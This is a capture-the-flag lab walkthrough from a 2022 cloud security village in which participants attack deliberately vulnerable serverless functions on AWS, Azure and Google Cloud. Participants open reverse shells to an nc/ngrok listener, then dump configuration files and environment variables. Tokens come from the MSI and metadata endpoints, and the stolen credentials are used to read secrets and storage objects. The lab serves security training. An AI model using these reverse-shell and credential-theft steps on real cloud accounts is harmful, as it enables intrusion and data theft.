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Hackers Teaching Hackers 2022 Cloud Security Village

Puma Security hosted the 2022 Hackers Teaching Hackers (HTH) Cloud Security Village.

Puma Security Hackers Teaching Hackers 2022 Cloud Security Village

The mission is to compromise a Cloud Function running in the Big 3 public cloud providers: AWS, Azure, and Google Cloud.


To get started, install the following tools on your machine:


For each cloud function, you need to exfiltrate the following data from the cloud:

  • Configuration Flag: Find the directory containing the function’s source code. You will find a configuration file with the first flag.

  • Service Account Credentials: Steal the function’s service account credentials. You will need them to exfiltrate the additional flags.

  • Secrets Manager Flag: Dump the function’s environment variables. You will find an environment variable pointing to a secret stored in the cloud. Use the stolen function credentials to read the flag from the cloud provider’s secrets manager API.

  • Storage Service Flag: Review the configuration file again. You will find the name of a storage bucket and object. Use the stolen function credentials to read the storage object’s metadata and find the flag.

Each function is configured to use two URL parameters, which will allow you to exfiltrate the data.

  • host: set this value to the ngrok or cloud virtual machine’s public IP address.

  • port: set this value to the ngrok port or the cloud virtual machine’s nc listener port.

To get started, set up a the reverse shell listener and environment variables for invoking the function endpoint. Select only one of the following options.

Option 1: Ngrok Reverse Shell

  1. Sign up for a free tier ngrok account and install the binary.

  2. Copy your ngrok authentication token and running the following command to activate the ngrok agent on your workstation.

     ngrok authtoken ENTER_YOUR_AUTH_TOKEN
  3. Open a new Terminal tab. Run the following command to start a netcat listener on port 4444:

    • Run this command from Mac and cloud based operating systems:

        nc -l 4444
    • Kali Linux requires you to use the -p switch before the port. Use nc -l -p 4444 from Kali Linux virtual machines.

        nc -l -p 4444
  4. Open a new Terminal tab. Run the following command to start an ngrok TCP tunnel on port 4444 to your netcat lister:

     ngrok tcp 4444 --log /tmp/ngrok.json --log-format json
  5. Open a new Terminal tab. Run the following commands to set the nc host and port parameters.

     NGROK_URL=$(cat /tmp/ngrok.json | jq -r 'select(.msg == "started tunnel").url' | tail -1 | awk 'BEGIN { FS="tcp://" }; { print $2 }')
     NC_HOST=$(echo $NGROK_URL | awk 'BEGIN { FS=":" }; { print $1 }')
     NC_PORT=$(echo $NGROK_URL | awk 'BEGIN { FS=":" }; { print $2 }')
     echo "Ngrok tunnel $NC_HOST is listening on port $NC_PORT"

Option 2: Cloud Hosted Virtual Machine

From a cloud hosted virtual machine with a public IP address, you won’t need to use ngrok. Instead, open up a firewall rule (e.g. security group rule) that allows ingress traffic on port 4444.

  1. Connect to your cloud hosted virtual machine over SSH.

  2. Open a new Terminal tab. Run the following command to start a netcat listener on port 4444:

     nc -l 4444
  3. Open a new Terminal tab. Run the following command to set the nc host and port parameters.


Panther: AWS Lambda

The Panther function is a nodejs function hosted in AWS Lambda. Let’s start exfiltrating data from the function’s execution environment.

Panther Configuration Flag

  1. Using the same Terminal tab that has the NC_HOST and NC_PORT environment variables set, run the following command to set two additional environment variables for the PANTHER_URL and PANTHER_API_KEY:

  2. Run the following command to invoke the AWS Lambda function and establish the reverse shell. Note: The function timeout is 60 sections. You will need to reestablish this connection multiple times to exfiltrate all of the required data elements from the environment.

     curl -s -H "X-Api-Key: $PANTHER_API_KEY" "$PANTHER_FUNCTION_URL?host=$NC_HOST&port=$NC_PORT"
  3. While the function is running, switch back to the Terminal running your nc listener. Run the id command to verify the reverse shell is working. What user is executing the Lambda function?

  4. Confirm the output displays the random sbx_user executing the Lambda function.

     uid=993(sbx_user1051) gid=990 groups=990
  5. Run the pwd command to view the current directory. What is the current directory?

  6. Observe the process is executing inside the var/task directory.

  7. List the contents of the /var/task directory by running the ls /var/task command. Do you see a configuration file that might contain the function’s environment details?

     ls /var/task
  8. Observe one of the files config.json contains the function’s environment configuration data.

  9. Dump the contents of the /var/task/config.json file by running the cat /var/task/config.json command. Do you see the Panther Configuration Flag?

     cat /var/task/config.json
  10. Observe the Panther Configuration Flag is stored in the database.pass field.

       "database": {
         "user": "panther_user",
         "pass": "WHAT_IS_THE_FLAG?"
       "storage": {
         "bucket": "DO_YOU_SEE_A_BUCKET_NAME?",
         "object": "panther.jpg"
  11. Congratulations, you have discovered the first AWS flag. Make sure you keep the contents of the config.json file. You will need another configuration value to find the last flag.

Panther Service Account Credentials

To move laterally through the the victim’s AWS environment, you will need to steal the function’s service account credentials. In AWS Lambda, the Lambda execution role’s credentials are stored in the environment variables.

  1. Dump the function’s environment variables by running the env command.

  2. Review the environment variables and locate the following values. You will need all of these values to exfiltrate the remaining flags from the victim’s cloud account.






  3. At this point, you no longer need the reverse shell to find the remaining flags. You can authenticate directly to the victim’s AWS account using the function’s credentials. Open a new Terminal tab and export the following environment variables.


Panther Secrets Manager Flag

To exfiltrate the remaining Panther flags, you will need to install the AWS Command Line Interface.

  1. Start by verifying the AWS CLI is authenticating under the Panther function’s execution role. Run the aws sts get-caller-identity command to view the authenticated role’s details. The CLI is authenticating to AWS with the stolen function’s credentials.

       "UserId": "AROAWFPTUW2CLID4TRYUR:serverless-prey-panther-4259ab66c461",
       "Account": "123456789012",
       "Arn": "arn:aws:sts::123456789012:assumed-role/panther-lambda-4259ab66c461-role/serverless-prey-panther-4259ab66c461"
  2. Shift your focus to exfiltrating the Panther function’s $PANTHER_SECRET_ARN by running the aws secretsmanager get-secret-value command. Run the following command to view the Panther function’s secret value.

     aws secretsmanager get-secret-value --secret-id $PANTHER_SECRET_ARN
  3. Observe the Panther Secrets Manager Flag is stored in the SecretString field.

       "ARN": "arn:aws:secretsmanager:us-east-1:123456789012:secret:panther-3649deb9-9100-97b4-a4cc-15c5791a17e0-Iv6itT",
       "Name": "panther-3649deb9-9100-97b4-a4cc-15c5791a17e0",
       "VersionId": "CB66A796-6848-44FB-AA9C-51507153E8CB",
       "SecretString": "WHAT_IS_THE_FLAG?",

Panther Storage Service Flag

To exfiltrate the final Panther flag, you will need to inspect the Panther function’s S3 bucket. The storage bucket and storage object details were acquired from the config.json file.

  1. Start by setting the PANTHER_BUCKET environment variable to the environment’s storage bucket name found in the config.json file.

  2. Exfiltrate the storage object from the bucket using the aws s3api get-object command. Run the following command to download the panther.jpg file to your file system.

     aws s3api get-object --bucket $PANTHER_BUCKET --key panther.jpg ~/Downloads/panther.jpg
  3. Open the file. What a cute picture! But, there is no flag.

  4. Examine the image’s metadata using the aws s3api get-object-tagging command. Run the following command to view the panther.jpg object’s tag values.

     aws s3api get-object-tagging --bucket $PANTHER_BUCKET --key panther.jpg
  5. Observe the response shows a base64 encoded flag. Decode the value to find the final Panther flag.

       "TagSet": [
           "Key": "flag",
           "Value": "WHAT_IS_THE_FLAG?"

Cougar: Azure Function

The Cougar function is a dotnet function hosted in Azure. Let’s start exfiltrating data from the function’s execution environment.

Cougar Configuration Flag

  1. Using the same Terminal tab that has the NC_HOST and NC_PORT environment variables set, run the following command to set two additional environment variables for the COUGAR_FUNCTION_URL and COUGAR_API_KEY:

  2. Run the following command to invoke the Azure function and establish the reverse shell. Note: The function timeout is 60 sections. You will need to reestablish this connection multiple times to exfiltrate all of the required data elements from the Lambda environment.

  3. While the function is running, switch back to the Terminal running your nc listener. Run the id command to verify the reverse shell is working. What user is executing the Lambda function?

  4. Confirm the output displays the random app executing the Azure function.

     uid=1000(app) gid=1000(app) groups=1000(app)
  5. Run the pwd command to view the current directory. What is the current directory?

  6. Observe the process is executing inside the / directory.

  7. List the contents of the /home/site/wwwroot directory by running the ls /home/site/wwwroot command. Do you see a configuration file that might contain the function’s environment details?

     ls /home/site/wwwroot
  8. Observe one of the files appsettings.json contains the function’s environment configuration data.

  9. Dump the contents of the /home/site/wwwroot/appsettings.json file by running the cat /home/site/wwwroot/appsettings.json command. Do you see the Cougar Configuration Flag?

     cat /home/site/wwwroot/appsettings.json
  10. Observe the Cougar Configuration Flag is stored in the ConnectionStrings.DefaultConnection field.

       "ConnectionStrings": {
         "DefaultConnection": "Server=;uid=cougar_user;pwd=WHAT_IS_THE_FLAG?"
       "Storage" : {
         "account" : "DO_YOU_SEE_A_STORAGE_ACCOUNT?",
         "container" : "assets",
         "blob" : "cougar.jpg"
  11. Congratulations, you have discovered the first Azure flag. Make sure you keep the contents of the appsettings.json file. You will need another configuration value to find the last flag.

Cougar Service Account Credentials

To move laterally through the the victim’s Azure subscription, you will need to steal the function’s service account credentials. In Azure Functions, the Managed Service Identity (MSI) creates temporary credentials for accessing the backend Azure APIs.

  1. Dump the function’s environment variables by running the env command.

  2. Review the environment variables and locate the following values. You will need all of these values to exfiltrate the remaining flags from the victim’s cloud account.





  3. The MSI_ENDPOINT and MSI_SECRET environment variables are randomly generated for each function. These values point to the Managed Service Identity (MSI) endpoint that can be used to request JSON Web Tokens (JWT) for authenticating to other Azure services. Run the following commands to generate a JWT for accessing the Azure Storage and Azure Key Vault services. Run the following command in the reverse shell to request an Azure Storage token.

     curl -s -H "Secret: $MSI_SECRET" "$MSI_ENDPOINT?api-version=2017-09-01&resource=" && echo
  4. Observe the response contains a JSON Web Token (JWT) that can be used for authenticating to the Azure Storage API.

     {"access_token":"STOLEN_STORAGE_TOKEN","expires_on":"10/23/2022 05:01:27 +00:00","resource":"","token_type":"Bearer","client_id":"5eD662a5-4a95-4c37-Ac6e-978daac560b4"}
  5. Run the following command in the reverse shell to request an Azure Key Vault token.

     curl -s -H "Secret: $MSI_SECRET" "$MSI_ENDPOINT?api-version=2017-09-01&resource=" && echo
  6. Observe the response contains a JSON Web Token (JWT) that can be used for authenticating to the Azure Key Vault API.

     {"access_token":"STOLEN_VAULT_TOKEN","expires_on":"10/23/2022 05:01:21 +00:00","resource":"","token_type":"Bearer","client_id":"5eD662a5-4a95-4c37-Ac6e-978daac560b4"}
  7. At this point, you no longer need the reverse shell to find the remaining flags. You can authenticate directly to the victim’s Azure subscription using the function’s credentials. Open a new Terminal tab and export the following environment variables.


Cougar Secrets Manager Flag

To exfiltrate the Cougar Secrets Manager Flag, you will need to invoke the Key Vault API.

  1. Run the following curl command to view the COUGAR_SECRET_NAME value in the COUGAR_KEY_VAULT_URL key vault.

     curl -s -H "Authorization: Bearer $AZURE_VAULT_TOKEN" "${COUGAR_KEY_VAULT_URL}secrets/$COUGAR_SECRET_NAME?api-version=7.0" | jq
  2. Observe the Cougar Secrets Manager Flag is stored in the value field.

       "value": "WHAT_IS_THE_FLAG?",
       "contentType": "",
       "id": "",
       "attributes": {
         "enabled": true,
         "created": 1665526885,
         "updated": 1665526885,
         "recoveryLevel": "Recoverable+Purgeable"
       "tags": {}

Cougar Storage Service Flag

To exfiltrate the final Cougar flag, you will need to inspect the Cougar function’s Azure Storage account. The storage account container and blob details were acquired from the appsettings.json file. Then, use the Azure Storage API to exfiltrate the object.

  1. Start by setting the COUGAR_STORAGE_ACCOUNT environment variable to the storage account name found in the appsettings.json file.

  2. Exfiltrate the blob object from the storage account by making a GET request to the Azure Storage account. Run the following command to download the cougar.jpg file to your file system.

     curl -s -H "x-ms-version: 2017-11-09" -H "Authorization: Bearer $AZURE_STORAGE_TOKEN" "https://$" --output ~/Downloads/cougar.jpg
  3. Open the file. What a cute picture! But, there is no flag.

  4. Examine the image’s metadata to find the flag. Run the following command to inspect the image metadata using the HEAD verb.

     curl --head -H "x-ms-version: 2017-11-09" -H "Authorization: Bearer $AZURE_STORAGE_TOKEN" "https://$"
  5. Observe the response returns the x-ms-meta-Flag.

     HTTP/1.1 200 OK
     Content-Length: 47081
     Content-Type: application/octet-stream
     Last-Modified: Tue, 11 Oct 2022 22:18:47 GMT
     Accept-Ranges: bytes
     ETag: "0x8DAABD6913CCF80"
     Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
     x-ms-request-id: c2b955b1-001e-0023-28e0-e536fe000000
     x-ms-version: 2017-11-09
     x-ms-meta-Flag: WHAT_IS_THE_FLAG?

Cheetah: Google Cloud Function

The Cheetah function is a Go function hosted in Google Cloud. Let’s start exfiltrating data from the function’s execution environment.

Cheetah Configuration Flag

  1. Using the same Terminal tab that has the NC_HOST and NC_PORT environment variables set, run the following command to set two additional environment variables for the CHEETAH_FUNCTION_URL and CHEETAH_API_KEY:

  2. Run the following command to invoke the Google Cloud function and establish the reverse shell. Note: The function timeout is 60 sections. You will need to reestablish this connection multiple times to exfiltrate all of the required data elements from the environment.

  3. While the function is running, switch back to the Terminal running your nc listener. Run the id command to verify the reverse shell is working. What user is executing the Lambda function?

  4. Confirm the output displays the random www-data user executing the Google Cloud function.

     uid=33(www-data) gid=33(www-data) groups=33(www-data)
  5. Run the pwd command to view the current directory. What is the current directory?

  6. Observe the process is executing inside the /workspace directory.

  7. Run the ls /workspace/serverless_function_source_code command to view the contents of the source directory. Do you see a configuration file that might contain the function’s environment details?

  8. Observe one of the files, cheetah.yaml, contains the function’s environment configuration data.

  9. Run the cat /workspace/serverless_function_source_code/cheetah.yaml command to dump the contents of the file. Do you see the Cheetah Configuration Flag?

  10. Observe the Cheetah Configuration Flag is stored in the database.pass field.

     # Server configurations
       host: ""
       port: 8000
     # Database credentials
       user: "cheetah_user"
       pass: "WHAT_IS_THE_FLAG?"
     # Storage bucket
       bucket: "DO_YOU_SEE_A_BUCKET_NAME?"
       object: "cheetah.jpg"
  11. Congratulations, you have discovered the first Google Cloud flag. Make sure you keep the contents of the cheetah.yaml file. You will need another configuration value to find the last flag.

Cheetah Service Account Credentials

To move laterally through the the victim’s GCP project, you will need to steal the function’s service account credentials. In Google Cloud Functions, the Instance Metadata Service (IMDS) creates temporary credentials for accessing the GCP APIs.

  1. Starting by dumping the function’s environment variables by running the env command.

  2. Review the environment variables and locate the following values. You will need these values to exfiltrate the remaining flags from the victim’s cloud account.



  3. Query the Instance Metadata Service (IMDS) for an OAuth Bearer token.

     curl -s -H "Metadata-Flavor: Google"
  4. Observe the response contains an OAuth Bearer token that can be used for authenticating to the Google Cloud APIs.

  5. At this point, you no longer need the reverse shell to find the remaining flags. You can authenticate directly to the victim’s GCP project using the function’s credentials. Open a new Terminal tab and export the following environment variables. Note: Make sure to include the padding (trailing period characters) in the access token.


Cheetah Secrets Manager Flag

To exfiltrate the Cheetah Secrets Manager Flag, you will need to invoke the Secrets Manger API.

  1. Run the following curl command to view the CHEETAH_SECRET_NAME secrets manager value.

     curl -s -H "Authorization: Bearer $GCP_TOKEN"$CHEETAH_PROJECT_ID/secrets/$CHEETAH_SECRET_NAME/versions/latest:access | jq
  2. Observe the Cheetah Secrets Manager Flag is as a base64 encoded value in the data field. Decode the value to find the flag.

       "name": "projects/123456789012/secrets/cheetah-c5afe051-dc0e-34e0-df4d-b65be7bd6e7b/versions/1",
       "payload": {
         "data": "WHAT_IS_THE_FLAG?"

Cheetah Storage Service Flag

To exfiltrate the final Cheetah flag, you will need to inspect the Cheetah function’s bucket. The Cloud Storage bucket was acquired from the cheetah.yaml configuration file. Then, use the Cloud Storage API to exfiltrate the object.

  1. Start by setting the GCP_BUCKET environment variable to the bucket name found in the cheetah.yaml file.

  2. Exfiltrate the object from the storage bucket by making a GET request to the GCS API.

     curl -s -H "Authorization: Bearer $GCP_TOKEN" "$GCP_BUCKET/o/cheetah.jpg?alt=media" --output ~/Downloads/cheetah.jpg
  3. Open the file. What a cute picture! But, there is no flag.

  4. Examine the image’s metadata to find the flag.

     curl -s -H "Authorization: Bearer $GCP_TOKEN" "$GCP_BUCKET/o/cheetah.jpg"
  5. Observe the response returns the object metadata, which includes the final flag.

       "kind": "storage#object",
       "id": "cheetah-1c504e5f-dfa9-f266-4cb7-7a6d2f521e09/cheetah.jpg/1665531131912276",
       "selfLink": "",
       "mediaLink": "",
       "name": "cheetah.jpg",
       "bucket": "cheetah-1c504e5f-dfa9-f266-4cb7-7a6d2f521e09",
       "generation": "1665531131912276",
       "metageneration": "1",
       "contentType": "image/jpeg",
       "storageClass": "STANDARD",
       "size": "104368",
       "md5Hash": "+J1a2vdc98xIawq3B9heAQ==",
       "crc32c": "4Fz3iw==",
       "etag": "CNTA6/uq2foCEAE=",
       "timeCreated": "2022-10-11T23:32:11.917Z",
       "updated": "2022-10-11T23:32:11.917Z",
       "timeStorageClassUpdated": "2022-10-11T23:32:11.917Z",
       "metadata": {
         "flag": "WHAT_IS_THE_FLAG?"


Congratulations, you have completed the HTH Cloud Security Village. We hope you enjoyed learning how to exfiltrate service account credentials from the cloud Functions as a Service (FaaS) platforms: Lambda, Azure Functions, and Cloud Functions. After stealing the function’s credentials, you saw how simple it is to use those credentials for exfiltrating secrets and storage data.

The environment you attacked was built using the Serverless Prey open source project. Feel free to explore the repository to see how Terraform deploys and configures the environment. Feel free to deploy the functions into your own cloud accounts, teach other folks how to exfiltrate credentials, and expand the project to pivot into other cloud services.

About The Author

Eric Johnson is a co-founder and Principal Security Engineer at Puma Security. His experience includes performing cloud security reviews, infrastructure as code automation, application security automation, web and mobile application penetration testing, secure development lifecycle consulting, and secure code review assessments.

Eric is also a Senior Instructor with the SANS Institute where he authors information security courses on cloud security, DevSecOps automation, and secure coding. He delivers security training globally for SANS, as well as presents security research at conferences including RSA, BlackHat, OWASP, BSides, DevOpsDays, fwd:cloudsec, and ISSA.